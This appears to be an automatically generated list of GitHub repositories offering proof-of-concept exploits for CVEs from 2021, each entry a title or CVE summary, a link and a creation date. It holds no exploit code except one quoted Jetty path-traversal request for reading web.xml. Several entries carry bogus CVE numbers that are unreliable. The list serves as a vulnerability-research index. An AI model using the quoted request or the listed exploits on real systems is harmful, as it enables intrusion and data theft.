**PoC for exploiting CVE-2020-3426 : A vulnerability in the implementation of the Low Power, Wide Area (LPWA) subsystem of Cisco IOS Software for Cisco 800 Series Industrial Integrated Services Routers (Industrial ISRs) and Cisco 1000 Series Connected Grid Routers (CGR1000) could allow an unauthenticated, remote attacker to gain unauthorized read access to sensitive data or cause a denial of service (DoS) condition. The vulnerability is due to a lack of input and validation checking mechanisms for virtual-LPWA (VLPWA) protocol modem messages. An attacker could exploit this vulnerability by supplying crafted packets to an affected device. A successful exploit could allow the attacker to gain unauthorized read access to sensitive data or cause the VLPWA interface of the affected device to shut down, resulting in DoS condition.** : [AlAIAL90/CVE-2020-3426](https://github.com/AlAIAL90/CVE-2020-3426) create time: 2021-08-07T15:35:16Z

**PoC for exploiting CVE-2020-3429 : A vulnerability in the WPA2 and WPA3 security implementation of Cisco IOS XE Wireless Controller Software for the Cisco Catalyst 9000 Family could allow an unauthenticated, adjacent attacker to cause denial of service (DoS) condition on an affected device. The vulnerability is due to incorrect packet processing during the WPA2 and WPA3 authentication handshake when configured for dot1x or pre-shared key (PSK) authentication key management (AKM) with 802.11r BSS Fast Transition (FT) enabled. An attacker could exploit this vulnerability by sending a crafted authentication packet to an affected device. A successful exploit could cause an affected device to reload, resulting in a DoS condition.** : [AlAIAL90/CVE-2020-3429](https://github.com/AlAIAL90/CVE-2020-3429) create time: 2021-08-07T15:35:12Z

**PoC for exploiting CVE-2020-3435 : A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to overwrite VPN profiles on an affected device. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system. The vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted IPC message to the AnyConnect process on an affected device. A successful exploit could allow the attacker to modify VPN profile files. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system.** : [AlAIAL90/CVE-2020-3435](https://github.com/AlAIAL90/CVE-2020-3435) create time: 2021-08-07T15:35:08Z

**PoC for exploiting CVE-2020-3434 : A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to cause a denial of service (DoS) condition on an affected device. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system. The vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted IPC message to the AnyConnect process on an affected device. A successful exploit could allow the attacker to stop the AnyConnect process, causing a DoS condition on the device. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system.** : [AlAIAL90/CVE-2020-3434](https://github.com/AlAIAL90/CVE-2020-3434) create time: 2021-08-07T15:35:04Z

**PoC for exploiting CVE-2020-3477 : A vulnerability in the CLI parser of Cisco IOS Software and Cisco IOS XE Software could allow an authenticated, local attacker to access files from the flash: filesystem. The vulnerability is due to insufficient application of restrictions during the execution of a specific command. An attacker could exploit this vulnerability by using a specific command at the command line. A successful exploit could allow the attacker to obtain read-only access to files that are located on the flash: filesystem that otherwise might not have been accessible.** : [AlAIAL90/CVE-2020-3477](https://github.com/AlAIAL90/CVE-2020-3477) create time: 2021-08-07T15:34:59Z

**PoC for exploiting CVE-2020-3475 : Multiple vulnerabilities in the web management framework of Cisco IOS XE Software could allow an authenticated, remote attacker with read-only privileges to gain unauthorized read access to sensitive data or cause the web management software to hang or crash, resulting in a denial of service (DoS) condition. For more information about these vulnerabilities, see the Details section of this advisory.** : [AlAIAL90/CVE-2020-3475](https://github.com/AlAIAL90/CVE-2020-3475) create time: 2021-08-07T15:34:55Z

**PoC for exploiting CVE-2020-3472 : A vulnerability in the contacts feature of Cisco Webex Meetings could allow an authenticated, remote attacker with a legitimate user account to access sensitive information. The vulnerability is due to improper access restrictions on users who are added within user contacts. An attacker on one Webex Meetings site could exploit this vulnerability by sending specially crafted requests to the Webex Meetings site. A successful exploit could allow the attacker to view the details of users on another Webex site, including user names and email addresses.** : [AlAIAL90/CVE-2020-3472](https://github.com/AlAIAL90/CVE-2020-3472) create time: 2021-08-07T15:34:51Z

**PoC for exploiting CVE-2020-3465 : A vulnerability in Cisco IOS XE Software could allow an unauthenticated, adjacent attacker to cause a device to reload. The vulnerability is due to incorrect handling of certain valid, but not typical, Ethernet frames. An attacker could exploit this vulnerability by sending the Ethernet frames onto the Ethernet segment. A successful exploit could allow the attacker to cause the device to reload, resulting in a denial of service (DoS) condition.** : [AlAIAL90/CVE-2020-3465](https://github.com/AlAIAL90/CVE-2020-3465) create time: 2021-08-07T15:34:46Z

**PoC for exploiting CVE-2020-3453 : Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV340 Series Routers could allow an authenticated, remote attacker with administrative credentials to execute arbitrary commands on the underlying operating system (OS) as a restricted user. For more information about these vulnerabilities, see the Details section of this advisory.** : [AlAIAL90/CVE-2020-3453](https://github.com/AlAIAL90/CVE-2020-3453) create time: 2021-08-07T15:34:42Z

**PoC for exploiting CVE-2020-3471 : A vulnerability in Cisco Webex Meetings and Cisco Webex Meetings Server could allow an unauthenticated, remote attacker to maintain bidirectional audio despite being expelled from an active Webex session. The vulnerability is due to a synchronization issue between meeting and media services on a vulnerable Webex site. An attacker could exploit this vulnerability by sending crafted requests to a vulnerable Cisco Webex Meetings or Cisco Webex Meetings Server site. A successful exploit could allow the attacker to maintain the audio connection of a Webex session despite being expelled.** : [AlAIAL90/CVE-2020-3471](https://github.com/AlAIAL90/CVE-2020-3471) create time: 2021-08-07T15:34:38Z

**PoC for exploiting CVE-2020-3470 : Multiple vulnerabilities in the API subsystem of Cisco Integrated Management Controller (IMC) could allow an unauthenticated, remote attacker to execute arbitrary code with root privileges. The vulnerabilities are due to improper boundary checks for certain user-supplied input. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the API subsystem of an affected system. When this request is processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code with root privileges on the underlying operating system (OS).** : [AlAIAL90/CVE-2020-3470](https://github.com/AlAIAL90/CVE-2020-3470) create time: 2021-08-07T15:34:34Z

**PoC for exploiting CVE-2021-28966 : In Ruby through 3.0 on Windows, a remote attacker can submit a crafted path when a Web application handles a parameter with TmpDir.** : [AlAIAL90/CVE-2021-28966](https://github.com/AlAIAL90/CVE-2021-28966) create time: 2021-08-07T15:34:29Z

**PoC for exploiting CVE-2021-31799 : In RDoc 3.11 through 6.x before 6.3.1, as distributed with Ruby through 3.0.1, it is possible to execute arbitrary code via | and tags in a filename.** : [AlAIAL90/CVE-2021-31799](https://github.com/AlAIAL90/CVE-2021-31799) create time: 2021-08-07T15:34:25Z

**PoC for exploiting CVE-2021-20786 : Cross-site request forgery (CSRF) vulnerability in GroupSession (GroupSession Free edition from ver2.2.0 to the version prior to ver5.1.0, GroupSession byCloud from ver3.0.3 to the version prior to ver5.1.0, and GroupSession ZION from ver3.0.3 to the version prior to ver5.1.0) allows a remote attacker to hijack the authentication of administrators via a specially crafted URL.** : [AlAIAL90/CVE-2021-20786](https://github.com/AlAIAL90/CVE-2021-20786) create time: 2021-08-07T15:34:20Z

**PoC for exploiting CVE-2021-32558 : An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur.** : [AlAIAL90/CVE-2021-32558](https://github.com/AlAIAL90/CVE-2021-32558) create time: 2021-08-07T15:34:17Z

**PoC for exploiting CVE-2021-35478 : Nagios Log Server before 2.1.9 contains Reflected XSS in the dropdown box for the alert history and audit log function. All parameters used for filtering are affected. This affects users who open a crafted link or third-party web page.** : [AlAIAL90/CVE-2021-35478](https://github.com/AlAIAL90/CVE-2021-35478) create time: 2021-08-07T15:34:12Z

**PoC for exploiting CVE-2021-21295 : Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec `and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1 this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is a HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final As a workaround, the user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`.** : [AlAIAL90/CVE-2021-21295](https://github.com/AlAIAL90/CVE-2021-21295) create time: 2021-08-07T15:34:08Z

**PoC for exploiting CVE-2021-28165 : In Eclipse Jetty 7.2.2 to 9.4.38, 10.0.0.alpha0 to 10.0.1, and 11.0.0.alpha0 to 11.0.1, CPU usage can reach 100% upon receiving a large invalid TLS frame.** : [AlAIAL90/CVE-2021-28165](https://github.com/AlAIAL90/CVE-2021-28165) create time: 2021-08-07T15:34:04Z

**PoC for exploiting CVE-2021-29425 : In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like "//../foo", or "\\..\foo", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus "limited" path traversal), if the calling code would use the result to construct a path value.** : [AlAIAL90/CVE-2021-29425](https://github.com/AlAIAL90/CVE-2021-29425) create time: 2021-08-07T15:34:00Z

**PoC for exploiting CVE-2021-28169 : For Eclipse Jetty versions <= 9.4.40, <= 10.0.2, <= 11.0.2, it is possible for requests to the ConcatServlet with a doubly encoded path to access protected resources within the WEB-INF directory. For example a request to `/concat?/%2557EB-INF/web.xml` can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application.** : [AlAIAL90/CVE-2021-28169](https://github.com/AlAIAL90/CVE-2021-28169) create time: 2021-08-07T15:33:56Z

**PoC for exploiting CVE-2021-35479 : Nagios Log Server before 2.1.9 contains Stored XSS in the custom column view for the alert history and audit log function through the affected pp parameter. This affects users who open a crafted link or third-party web page.** : [AlAIAL90/CVE-2021-35479](https://github.com/AlAIAL90/CVE-2021-35479) create time: 2021-08-07T15:33:51Z

**PoC for exploiting CVE-2021-32610 : In Archive_Tar before 1.4.14, symlinks can refer to targets outside of the extracted archive, a different vulnerability than CVE-2020-36193.** : [AlAIAL90/CVE-2021-32610](https://github.com/AlAIAL90/CVE-2021-32610) create time: 2021-08-07T15:33:46Z

**PoC for exploiting CVE-2021-36004 : Adobe InDesign version 16.0 (and earlier) is affected by an Out-of-bounds Write vulnerability in the CoolType library. An unauthenticated attacker could leverage this vulnerability to achieve remote code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.** : [AlAIAL90/CVE-2021-36004](https://github.com/AlAIAL90/CVE-2021-36004) create time: 2021-08-07T15:33:43Z

**PoC for exploiting CVE-2021-31878 : An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request.** : [AlAIAL90/CVE-2021-31878](https://github.com/AlAIAL90/CVE-2021-31878) create time: 2021-08-07T15:33:38Z

**PoC for exploiting CVE-2021-36754 : PowerDNS Authoritative Server 4.5.0 before 4.5.1 allows anybody to crash the process by sending a specific query (QTYPE 65535) that causes an out-of-bounds exception.** : [AlAIAL90/CVE-2021-36754](https://github.com/AlAIAL90/CVE-2021-36754) create time: 2021-08-07T15:32:29Z

**PoC for exploiting CVE-2021-28674 : The node management page in SolarWinds Orion Platform before 2020.2.5 HF1 allows an attacker to create or delete a node (outside of the attacker's perimeter) via an account with write permissions. This occurs because node IDs are predictable (with incrementing numbers) and the access control on Services/NodeManagement.asmx/DeleteObjNow is incorrect. To exploit this, an attacker must be authenticated and must have node management rights associated with at least one valid group on the platform.** : [AlAIAL90/CVE-2021-28674](https://github.com/AlAIAL90/CVE-2021-28674) create time: 2021-08-07T15:32:25Z

**PoC for exploiting CVE-2021-36983 : replay-sorcery-kms in Replay Sorcery 0.6.0 allows a local attacker to gain root privileges via a symlink attack on /tmp/replay-sorcery or /tmp/replay-sorcery/device.sock.** : [AlAIAL90/CVE-2021-36983](https://github.com/AlAIAL90/CVE-2021-36983) create time: 2021-08-07T15:32:21Z

**PoC for exploiting CVE-2021-22898 : curl 7.7 through 7.76.1 suffers from an information disclosure when the `-t` command line option, known as `CURLOPT_TELNETOPTIONS` in libcurl, is used to send variable=content pairs to TELNET servers. Due to a flaw in the option parser for sending NEW_ENV variables, libcurl could be made to pass on uninitialized data from a stack based buffer to the server, resulting in potentially revealing sensitive internal information to the server using a clear-text network protocol.** : [AlAIAL90/CVE-2021-22898](https://github.com/AlAIAL90/CVE-2021-22898) create time: 2021-08-07T15:32:17Z

**PoC for exploiting CVE-2021-36217 : Avahi 0.8 allows a local denial of service (NULL pointer dereference and daemon crash) against avahi-daemon via the D-Bus interface or a "ping .local" command.** : [AlAIAL90/CVE-2021-36217](https://github.com/AlAIAL90/CVE-2021-36217) create time: 2021-08-07T15:32:13Z

**no description** : [CyberCommands/CVE-2021-3156](https://github.com/CyberCommands/CVE-2021-3156) create time: 2021-08-07T08:38:50Z

**Cockpit CMS 0.11.1 NoSQL Injection to Remote Code Execution** : [0z09e/CVE-2020-35846](https://github.com/0z09e/CVE-2020-35846) create time: 2021-08-05T18:48:52Z

**Chikitsa Patient Management System Stored Cross-Site Scripting (XSS)** : [jboogie15/CVE-2021-38149](https://github.com/jboogie15/CVE-2021-38149) create time: 2021-08-06T09:01:40Z

**no description** : [w33vils/CVE-2020-35847_CVE-2020-35848](https://github.com/w33vils/CVE-2020-35847_CVE-2020-35848) create time: 2021-08-06T09:19:01Z

**no description** : [Pastea/CVE-2017-1000486](https://github.com/Pastea/CVE-2017-1000486) create time: 2021-08-05T17:42:54Z

**CVE-2018-8120** : [nanabingies/CVE-2018-8120](https://github.com/nanabingies/CVE-2018-8120) create time: 2021-08-05T16:55:50Z

**This repo contains some POC's and exploits I have written for some targets.** : [nanabingies/CVE-2019-16724](https://github.com/nanabingies/CVE-2019-16724) create time: 2020-08-25T06:47:51Z

**SyncBreeze Enterprise Remote BufferOverflow [CVE-2017-14980]** : [Xcatolin/SyncBreeze-BoF](https://github.com/Xcatolin/SyncBreeze-BoF) create time: 2021-08-05T16:06:57Z

**no description** : [artsking/Sqlite-CVE-2019-20218](https://github.com/artsking/Sqlite-CVE-2019-20218) create time: 2021-08-05T05:13:50Z

**hallo** : [woliujizhou/cve-2021-2998](https://github.com/woliujizhou/cve-2021-2998) create time: 2021-08-05T02:23:38Z

**An implementation of CVE-2017-5638** : [jptr218/struts_hack](https://github.com/jptr218/struts_hack) create time: 2021-08-04T17:27:55Z

**Windows Elevation of Privilege Vulnerability CVE-2021-36934** : [shaktavist/SeriousSam](https://github.com/shaktavist/SeriousSam) create time: 2021-08-04T10:37:41Z

**no description** : [s4dbrd/CVE-2020-9496](https://github.com/s4dbrd/CVE-2020-9496) create time: 2021-08-04T06:48:31Z

**no description** : [s4dbrd/CVE-2020-9496](https://github.com/s4dbrd/CVE-2020-9496) create time: 2021-08-04T06:20:31Z

**PoC for CVE-2021-3492 used at Pwn2Own 2021** : [synacktiv/CVE-2021-3492](https://github.com/synacktiv/CVE-2021-3492) create time: 2021-06-28T09:43:31Z

**CVE-2021-37832 - Hotel Druid 3.0.2 SQL Injection Vulnerability** : [dievus/CVE-2021-37832](https://github.com/dievus/CVE-2021-37832) create time: 2021-08-01T00:38:56Z

**no description** : [dievus/CVE-2021-37833](https://github.com/dievus/CVE-2021-37833) create time: 2021-08-01T00:34:27Z

**An implementation of CVE-2016-8740** : [jptr218/apachedos](https://github.com/jptr218/apachedos) create time: 2021-08-03T10:45:59Z

**POC of CVE-2021-2394** : [freeide/CVE-2021-2394](https://github.com/freeide/CVE-2021-2394) create time: 2021-08-02T04:19:11Z

**no description** : [woliujizhou/CVE-2021-2999899](https://github.com/woliujizhou/CVE-2021-2999899) create time: 2021-08-03T05:31:12Z

**no description** : [AssassinUKG/CVE-2021-22204](https://github.com/AssassinUKG/CVE-2021-22204) create time: 2021-08-02T18:56:16Z

**POC experiments with Volume Shadow copy Service (VSS)** : [grishinpv/poc_CVE-2021-36934](https://github.com/grishinpv/poc_CVE-2021-36934) create time: 2021-08-02T13:47:17Z

**no description** : [whitetea2424/CVE-2020-27955-LFS-main](https://github.com/whitetea2424/CVE-2020-27955-LFS-main) create time: 2021-08-02T12:32:08Z

**Local exploit for CVE-2021-1675** : [tacbliw/PrintNightmare-LPE](https://github.com/tacbliw/PrintNightmare-LPE) create time: 2021-08-02T09:03:07Z

**no description** : [PenTestical/CVE-2021-22204](https://github.com/PenTestical/CVE-2021-22204) create time: 2021-08-02T09:11:27Z

**no description** : [xiaofeihahah/CVE-2021-21300](https://github.com/xiaofeihahah/CVE-2021-21300) create time: 2021-08-02T08:21:11Z

**Exploit for Authenticated Remote Code Execution on OpenPLC v3 Webserver** : [h3v0x/CVE-2021-31630-OpenPLC_RCE](https://github.com/h3v0x/CVE-2021-31630-OpenPLC_RCE) create time: 2021-08-02T04:48:24Z

**no description** : [xiaofeihahah/CVE-2021-21300](https://github.com/xiaofeihahah/CVE-2021-21300) create time: 2021-08-02T03:09:52Z

**no description** : [zeronohacker/CVE-2018-20250](https://github.com/zeronohacker/CVE-2018-20250) create time: 2021-08-02T01:24:01Z

**The dashboard gadgets preference resource of the Atlassian gadgets plugin used in Jira Server and Jira Data Center before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to obtain gadget related settings via a missing permissions check.** : [f4rber/CVE-2020-36287](https://github.com/f4rber/CVE-2020-36287) create time: 2021-08-02T01:52:39Z

**POC of CVE-2021-2394** : [lz2y/CVE-2021-2394](https://github.com/lz2y/CVE-2021-2394) create time: 2021-08-02T02:22:04Z

**SeriousSAM Auto Exploiter** : [websecnl/CVE-2021-36934](https://github.com/websecnl/CVE-2021-36934) create time: 2021-08-01T19:54:31Z

**no description** : [ErnestZiemkowski/cve-2018-6574](https://github.com/ErnestZiemkowski/cve-2018-6574) create time: 2021-08-01T12:47:02Z

**no description** : [PandatiX/CVE-2021-28378](https://github.com/PandatiX/CVE-2021-28378) create time: 2021-08-01T13:16:53Z

**My n-day exploit for CVE-2019-18634 (local privilege escalation)** : [aesophor/CVE-2019-18634](https://github.com/aesophor/CVE-2019-18634) create time: 2021-08-01T10:50:55Z

**Full unauthenticated RCE proof of concept for Rocket.Chat 3.12.1 CVE-2021-22911** : [optionalCTF/Rocket.Chat-Automated-Account-Takeover-RCE-CVE-2021-22911](https://github.com/optionalCTF/Rocket.Chat-Automated-Account-Takeover-RCE-CVE-2021-22911) create time: 2021-07-30T21:44:18Z

**Polkit D-Bus Authentication Bypass Exploit** : [0Day-dev/CVE-2021-3560](https://github.com/0Day-dev/CVE-2021-3560) create time: 2021-07-30T11:41:34Z

**WordPress Backup Guard Authenticated Remote Code Execution Exploit** : [0Day-dev/CVE-2021-24155.rb](https://github.com/0Day-dev/CVE-2021-24155.rb) create time: 2021-07-30T11:28:53Z

**Exploit for CVE-2018-3810** : [nth347/CVE-2018-3810_exploit](https://github.com/nth347/CVE-2018-3810_exploit) create time: 2021-07-30T10:06:04Z

**A Powrshell script to scan for CVE-2021-34470** : [technion/CVE-2021-34470scanner](https://github.com/technion/CVE-2021-34470scanner) create time: 2021-07-29T23:50:31Z

**CVE-2021-36934 HiveNightmare vulnerability checker and workaround** : [irissentinel/CVE-2021-36934](https://github.com/irissentinel/CVE-2021-36934) create time: 2021-07-29T20:35:22Z

**Techniques based on named pipes for pool overflow exploitation targeting the most recent (and oldest) Windows versions. (including a poc for CVE-2020-17087 and an off-by-one overflow)** : [vp777/Windows-Non-Paged-Pool-Overflow-Exploitation](https://github.com/vp777/Windows-Non-Paged-Pool-Overflow-Exploitation) create time: 2021-07-02T16:03:16Z

**no description** : [chompie1337/Linux_LPE_eBPF_CVE-2021-3490](https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490) create time: 2021-06-24T18:50:17Z

**Exploit for CVE-2019-10149** : [Stick-U235/CVE-2019-10149-Exploit](https://github.com/Stick-U235/CVE-2019-10149-Exploit) create time: 2021-07-29T16:44:08Z

**no description** : [ikramimamoglu/AmIAHuman-CVE-2021-33909](https://github.com/ikramimamoglu/AmIAHuman-CVE-2021-33909) create time: 2021-07-29T16:58:19Z

**Google Chrome Use After Free vulnerability reported by S4E Team** : [s4e-lab/CVE-2021-30573-PoC-Google-Chrome](https://github.com/s4e-lab/CVE-2021-30573-PoC-Google-Chrome) create time: 2021-07-29T12:53:13Z

**no description** : [xmco/sdwan-cve-2021-1480](https://github.com/xmco/sdwan-cve-2021-1480) create time: 2021-07-29T12:17:50Z

**Proof of concept for CVE-2021-27965 (Stack-based Buffer Overflow)** : [Crystalware/CVE-2021-27965](https://github.com/Crystalware/CVE-2021-27965) create time: 2021-07-29T09:32:56Z

**no description** : [hanchen666/CVE-2021-XXXX](https://github.com/hanchen666/CVE-2021-XXXX) create time: 2021-07-29T08:25:46Z

**Shellshock exploit aka CVE-2014-6271** : [b4keSn4ke/shellshock](https://github.com/b4keSn4ke/shellshock) create time: 2021-07-29T04:51:43Z

**Proof of concept code for CVE-2020-9014** : [Crystalware/CVE-2020-9014](https://github.com/Crystalware/CVE-2020-9014) create time: 2021-07-29T04:37:09Z

**CVE-2021-1239** : [wuyoukm/CVE-2021-1239](https://github.com/wuyoukm/CVE-2021-1239) create time: 2021-07-29T05:16:12Z

**CVE-2021-1238** : [wuyoukm/CVE-2021-1238](https://github.com/wuyoukm/CVE-2021-1238) create time: 2021-07-29T05:13:40Z

**CVE-2021-1237** : [wuyoukm/CVE-2021-1237](https://github.com/wuyoukm/CVE-2021-1237) create time: 2021-07-29T05:04:22Z

**CVE-2021-1236** : [wuyoukm/CVE-2021-1236](https://github.com/wuyoukm/CVE-2021-1236) create time: 2021-07-29T04:52:21Z

**CVE-2021-1235** : [wuyoukm/CVE-2021-1235](https://github.com/wuyoukm/CVE-2021-1235) create time: 2021-07-29T04:49:48Z

**CVE-2021-3438** : [wuyoukm/CVE-2021-3438](https://github.com/wuyoukm/CVE-2021-3438) create time: 2021-07-29T04:01:17Z

**CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (Python3 support)** : [A1vinSmith/CVE-2018-9276](https://github.com/A1vinSmith/CVE-2018-9276) create time: 2021-07-29T01:17:22Z

**CVE-2020-5248** : [Mkway/CVE-2020-5248](https://github.com/Mkway/CVE-2020-5248) create time: 2021-07-29T00:46:26Z

**Exploit for CVE-2018-12636** : [nth347/CVE-2018-12636_exploit](https://github.com/nth347/CVE-2018-12636_exploit) create time: 2021-07-28T16:30:05Z

**Local Privilege Escalation via snapd (CVE-2019-7304) Remastered PoC exploit** : [f4T1H21/dirty_sock](https://github.com/f4T1H21/dirty_sock) create time: 2021-07-28T13:06:41Z

**no description** : [zoukba0014/cve-2021-123456](https://github.com/zoukba0014/cve-2021-123456) create time: 2021-07-28T13:06:01Z

**no description** : [dorisroot1/CVE-2021-412999](https://github.com/dorisroot1/CVE-2021-412999) create time: 2021-07-28T12:24:39Z

**no description** : [dorisroot1/CVE-2021-4121442](https://github.com/dorisroot1/CVE-2021-4121442) create time: 2021-07-28T12:12:22Z

**no description** : [dorisroot1/CVE-2021-2197075](https://github.com/dorisroot1/CVE-2021-2197075) create time: 2021-07-28T12:10:45Z

**no description** : [dorisroot1/CVE-2021-42892849](https://github.com/dorisroot1/CVE-2021-42892849) create time: 2021-07-28T12:07:30Z

**no description** : [dorisroot1/CVE-2021-3214124](https://github.com/dorisroot1/CVE-2021-3214124) create time: 2021-07-28T12:05:39Z

**no description** : [dorisroot1/CVE-2021-41241412](https://github.com/dorisroot1/CVE-2021-41241412) create time: 2021-07-28T12:03:41Z

**no description** : [dorisroot1/CVE-2021-5128108](https://github.com/dorisroot1/CVE-2021-5128108) create time: 2021-07-28T11:59:26Z

**no description** : [dorisroot1/CVE-2021-1258008](https://github.com/dorisroot1/CVE-2021-1258008) create time: 2021-07-28T11:53:08Z

**no description** : [dorisroot1/CVE-2021-9878724](https://github.com/dorisroot1/CVE-2021-9878724) create time: 2021-07-28T11:50:00Z

**no description** : [dorisroot1/CVE-2021-23142414](https://github.com/dorisroot1/CVE-2021-23142414) create time: 2021-07-28T11:46:29Z

**no description** : [dorisroot1/CVE-2021-1594398](https://github.com/dorisroot1/CVE-2021-1594398) create time: 2021-07-28T11:43:55Z

**no description** : [dorisroot1/CVE-2021-4124214](https://github.com/dorisroot1/CVE-2021-4124214) create time: 2021-07-28T11:41:02Z

**no description** : [dorisroot1/CVE-2021-123324125](https://github.com/dorisroot1/CVE-2021-123324125) create time: 2021-07-28T11:37:54Z

**no description** : [dorisroot1/CVE-2021-12523214](https://github.com/dorisroot1/CVE-2021-12523214) create time: 2021-07-28T11:34:12Z

**no description** : [dorisroot1/CVE-2021-324213341](https://github.com/dorisroot1/CVE-2021-324213341) create time: 2021-07-28T11:28:24Z

**no description** : [dorisroot1/CVE-2021-57834782](https://github.com/dorisroot1/CVE-2021-57834782) create time: 2021-07-28T11:25:43Z

**no description** : [dorisroot1/CVE-2021-3020142](https://github.com/dorisroot1/CVE-2021-3020142) create time: 2021-07-28T11:21:49Z

**no description** : [dpredrag/CVE-2020-28502](https://github.com/dpredrag/CVE-2020-28502) create time: 2021-07-28T11:01:56Z

**no description** : [dorisroot1/CVE-2021-1908U77](https://github.com/dorisroot1/CVE-2021-1908U77) create time: 2021-07-28T11:11:47Z

**CESHI** : [dorisroot1/CVE-2021-98098098](https://github.com/dorisroot1/CVE-2021-98098098) create time: 2021-07-28T11:07:49Z

**TEST** : [dorisroot1/CVE-2021-20119090](https://github.com/dorisroot1/CVE-2021-20119090) create time: 2021-07-28T11:05:09Z

**no description** : [dorisroot1/CVE-2021-10909099222](https://github.com/dorisroot1/CVE-2021-10909099222) create time: 2021-07-28T10:56:19Z

**no description** : [dorisroot1/CVE-2021-1232123321](https://github.com/dorisroot1/CVE-2021-1232123321) create time: 2021-07-28T10:51:38Z

**no description** : [dorisroot1/CVE-2021-2321084](https://github.com/dorisroot1/CVE-2021-2321084) create time: 2021-07-28T10:49:19Z

**no description** : [dorisroot1/CVE-2021-112333212](https://github.com/dorisroot1/CVE-2021-112333212) create time: 2021-07-28T10:34:36Z

**no description** : [dorisroot1/CVE-2021-3211233](https://github.com/dorisroot1/CVE-2021-3211233) create time: 2021-07-28T10:31:49Z

**no description** : [dorisroot1/CVE_2021-123321](https://github.com/dorisroot1/CVE_2021-123321) create time: 2021-07-28T10:13:02Z

**一个测试项目** : [dorisroot1/CVE-2021-90000000000](https://github.com/dorisroot1/CVE-2021-90000000000) create time: 2021-07-28T09:51:03Z

**no description** : [TobiasS1402/CVE-2021-3438](https://github.com/TobiasS1402/CVE-2021-3438) create time: 2021-07-28T09:36:42Z

**no description** : [dorisroot1/CVE-2021-990909090](https://github.com/dorisroot1/CVE-2021-990909090) create time: 2021-07-28T09:36:34Z

**第一个项目在测试中** : [dorisroot1/CVE-2021-000000](https://github.com/dorisroot1/CVE-2021-000000) create time: 2021-07-28T09:35:14Z

**测试** : [dorisroot1/CVE-2021-1000001](https://github.com/dorisroot1/CVE-2021-1000001) create time: 2021-07-28T09:21:50Z

**To fight against Windows security breach PrintNightmare! (CVE-2021-34527, CVE-2021-1675)** : [Tomparte/PrintNightmare](https://github.com/Tomparte/PrintNightmare) create time: 2021-07-28T07:55:42Z

**poc** : [anmuxi-bai/CVE-2018-11790](https://github.com/anmuxi-bai/CVE-2018-11790) create time: 2021-07-28T06:18:30Z

**NYCY_homework_&_meeting** : [BizarreLove/CVE-2021-3560](https://github.com/BizarreLove/CVE-2021-3560) create time: 2021-07-28T06:05:46Z

**An implementation of CVE-2017-12617** : [jptr218/tc_hack](https://github.com/jptr218/tc_hack) create time: 2021-07-27T13:06:16Z

**no description** : [HaboobLab/CVE-2019-13764](https://github.com/HaboobLab/CVE-2019-13764) create time: 2021-07-27T08:30:00Z

**CVE-2021–36934. Exploit allowing you to read any registry hives as non-admin in powershell** : [wolf0x/PSHiveNightmare](https://github.com/wolf0x/PSHiveNightmare) create time: 2021-07-26T15:58:59Z

**HiveNightmare aka SeriousSAM** : [exploitblizzard/CVE-2021-36934](https://github.com/exploitblizzard/CVE-2021-36934) create time: 2021-07-27T06:54:30Z

**Proof of concept code for CVE-2021-3438** : [Crystalware/CVE-2021-3438](https://github.com/Crystalware/CVE-2021-3438) create time: 2021-07-27T06:05:08Z

**no description** : [haiclover/CVE-2021-21972](https://github.com/haiclover/CVE-2021-21972) create time: 2021-07-26T18:48:28Z

**no description** : [magichk/cve-2021-22146](https://github.com/magichk/cve-2021-22146) create time: 2021-07-22T06:50:34Z

**no description** : [0x0D1n/CVE-2021-36934](https://github.com/0x0D1n/CVE-2021-36934) create time: 2021-07-26T08:01:08Z

**CVE-2021-35448 (Remote Mouse GUI 3.008 - Local Privilege Escalation)** : [deathflash1411/CVE-2021-35448](https://github.com/deathflash1411/CVE-2021-35448) create time: 2021-07-26T07:10:10Z

